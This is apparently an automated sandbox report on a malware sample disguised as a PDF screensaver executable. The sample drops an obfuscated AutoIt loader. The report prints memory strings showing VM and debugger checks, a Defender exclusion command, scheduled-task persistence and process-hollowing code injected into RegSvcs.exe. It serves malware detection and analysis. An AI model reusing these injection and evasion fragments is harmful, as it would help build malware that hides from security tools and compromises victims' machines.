      Source: ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Thenzo
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VMwaretray.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exey
      Source: RegSvcs.exe, 0000000A.00000002.769785143.0000000001067000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exe
      Source: ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476957777.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeb
      Source: ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") ThenYu8
      Source: ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
      Source: ihgsvw.exe, 00000021.00000003.477232662.0000000000E1B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exee
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then0
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.331408820.000000000173F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exel
      Source: ihgsvw.exe, 00000023.00000003.496927668.0000000001694000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
      Source: ihgsvw.exe, 00000015.00000003.382773742.0000000000E0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeV
      Source: ihgsvw.exe, 00000023.00000003.493542771.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494962975.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496739314.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
      Source: ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
      Source: ihgsvw.exe, 00000015.00000003.383061801.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareUser.exeE97637D6
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
      Source: ihgsvw.exe, 00000023.00000003.496786438.00000000016F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwaretray.exed
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318121606.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EE6A3 VirtualQuery,GetSystemInfo,0_2_003EE6A3
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_003DA69B
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_003EC220
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA,0_2_003FB348
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C0E387
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C0D836
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C1A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00C1A488
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose,6_2_00C165F1
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW,6_2_00BDC642
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00C172E9
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose,6_2_00C17248
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BA5D78
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F7DEE mov eax, dword ptr fs:[00000030h] 0_2_003F7DEE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC5078 mov eax, dword ptr fs:[00000030h] 6_2_00BC5078
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003EF838
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FC030 GetProcessHeap,0_2_003FC030
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1F3FF BlockInput,6_2_00C1F3FF
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Memory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF9D5 SetUnhandledExceptionFilter,0_2_003EF9D5
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_003EFBCA
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003F8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003F8EBD
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0D65 SetUnhandledExceptionFilter,6_2_00BC0D65
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BD29B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BD29B2
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BC0BCF
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00BC0FB1

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 730000
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 5D7000
      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: select * from antivirusproducta32e83d//////8bd16a2ee83=zl
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -command add-mppreference -exclusionpath /83c4/cffd/6gz
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\local\temp\folder10_51tensi
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binaryenc61ef5a7537d6ey
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ntunmapviewofsectiond6|y
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user32.dll61ef5a7537d6sy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ndowprocwjy
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sssssseplacee838/////ay
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: execquery\localhost\ro
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sexemodule61ef5a7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: asmrylen
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iswow64process
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptrde0fe3ac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bufferasmetptr
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: binbufferetptrac427d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: byte[uctcreatea7537d6
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kernel32.dll0xn
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: virtualallocex7xg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword_ptr.x|
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_decryptdatad ad\xj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountincsxc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountecjx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _runbinary_fixreloc adax
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __crypt_refcountdecxx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: displayname
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _crypt_derivekeydx
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\tempsk
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user~14 ad
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\syswow64w64
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %localappdata%\temp\k
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majoroperatingsystemver
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: majorlinkerversionr<gj
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: addressofnewexeheader3gc
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: extendedregisters!gq
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: numberofsectionsaderxgv
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pointertosymboltable_go
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sizeofoptionalheader
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: flagsvg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segfsig
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seggsbg
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segds
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edi@x
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: esi@_p
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: edxh~
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ecx3a
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: seges
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: eflags
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segss
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: segcs
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @_0fo
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: magic
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: spareh
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bool*
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mutantx
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da07ca89775d4d1a96adc6186ba046975e576de71a2c29, "imagebase", $_y0x3856f9de14e2ba5f487d3ca88dd6)%
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da03e8ac4574770c = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec39371d648da99b77cc25 & "]")0
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9da06e2a9547d60269f = dllstructcreate("byte[" & $_y0x3856f9c701f7bc59777c34aab1ea364184789b7f6849ec393615648ea9a741d539c772 & "]", $_y0x3856f9de06c289745d400699b7ca007c)
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb255577407a78ecb36518053, $_y0x3856f9de1ee8a15e6c77279296dd3652a56bbc774b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c718eeba446d7339879deb2540927991, $_y0x3856f9c718eeba446d73399590f5327c
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0aaea34518865a6654b
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)9y
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9c71deeb25541 = dllstructgetsize($_y0x3856f9da0ae6bc5141)qy
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)ey
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if @error or not $_y0x3856f9cf2de6a45c41[0] then return seterror(1, 0, 0)iy<
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: local $_y0x3856f9de0ae6bc5141 = dllstructgetptr($_y0x3856f9da0ae6bc5141)=x
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $_y0x3856f9c717 = 1 to $_y0x3856f9c700f2a5527d601aa0bce12357886fbb4f
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: createobject("wscript.shell").run "c:\users\user~1\appdata\local\temp\folder~1\ihgsvw.exe c:\users\user~1\appdata\local\temp\folder~1\ccmbpo~1.doc"
      Source: ihgsvw.exe, 00000006.00000003.330900867.0000000001726000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x3856f9da07ca89775d4d0683badb1e6aaf5580535368e60d27 = dllstructcreate("char name[8];" & "dword unionofvirtualsizeandphysicaladdress;" & "dword virtualaddress;" & "dword sizeofrawdata;" & "dword po
      Source: ihgsvw.exe, 00000006.00000003.300374062.00000000017C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\c:\users\user\temp\wfccrina.ini~e;h
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cf80e - $_y0x3856f9de0fe3ac427d61268995eb0e
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \registry\user\s-1-5-21-3853321935-2125563209-4053062332-1002\software\microsoft\windows nt\currentversion?a
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)ca
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllcall("kernel32.dll", "bool", "terminateprocess", "handle", $_y0x3856f9c61ef5a7537d61269f, "dword", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l $_y0x3856f9da1ec28a69 = dllstructcreate("byte inheritedaddressspace;" & "byte readimagefileexecoptions;" & "byte beingdebugged;" & "byte spare;" & "ptr mutant;" & "ptr imagebaseaddress;" & "ptr loaderdata;" & "ptr processparameters;" & "ptr subsystemdata;" & "ptr processheap;" & "ptr fastpeblock;" & "ptr fastpeblockroutine;" & "ptr fastpebunlockroutine;" & "dword environmentupdatecount;" & "ptr kernelcallbacktable;" & "ptr eventlogsection;" & "ptr eventlog;" & "ptr freelist;" & "dword tlsexpansioncounter;" & "ptr tlsbitmap;" & "dword tlsbitmapbits[2];" & "ptr readonlysharedmemorybase;" & "ptr readonlysharedmemoryheap;" & "ptr readonlystaticserverdata;" & "ptr ansicodepagedata;" & "ptr oemcodepagedata;" & "ptr unicodecasetabledata;" & "dword numberofprocessors;" & "dword ntglobalflag;" & "byte spare2[4];" & "int64 criticalsectiontimeout;" & "dword heapsegmentreserve;" & "dword heapsegmentcommit;" & "dword heapdecommittotalfreethreshold;" & "dword heapdecommitfreeblockthreshold;" & "dword numberofheaps;" & "dword maximumnumberofheaps;" & "ptr processheaps;" & "ptr gdisharedhandletable;" & "ptr processstarterhelper;" & "ptr gdidcattributelist;" & "ptr loaderlock;" & "dword osmajorversion;" & "dword osminorversion;" & "dword osbuildnumber;" & "dword osplatformid;" & "dword imagesubsystem;" & "dword imagesubsystemmajorversion;" & "dword imagesubsystemminorversion;" & "dword gdihandlebuffer[34];" & "dword postprocessinitroutine;" & "dword tlsexpansionbitmap;" & "byte tlsexpansionbitmapbits[128];" & "dword sessionid")d
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "readprocessmemory", "ptr", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tructsetdata($_y0x3856f9da1ec28a69, "imagebaseaddress", $_y0x3856f9de14e2ba5f487d3ca88dd6)f
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "writepro" & "cessmemory", "handle", $_y0x3856f9c61ef5a7537d61269f, "ptr", $_y0x3856f9de1ec28a69, "ptr", dllstructgetptr($_y0x3856f9da1ec28a69), "dword_ptr", dllstructgetsize($_y0x3856f9da1ec28a69), "dword_ptr*", 0)$
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "e" & "ax", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653)#
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dllstructsetdata($_y0x3856f9da0dc886645d4a019f, "rcx", $_y0x3856f9de14e2ba5f487d3ca88dd6 + $_y0x3856f9c70be9bc4261423aaf97fb1960b653),
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "bool", "setthreadcontext", "handle", $_y0x3856f9c61aefba5579760c, "ptr", dllstructgetptr($_y0x3856f9da0dc886645d4a019f))
      Source: ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_y0x3856f9cf2de6a45c41 = dllcall("kernel32.dll", "dword", "resumethread", "handle", $_y0x3856f9c61aefba5579760c)
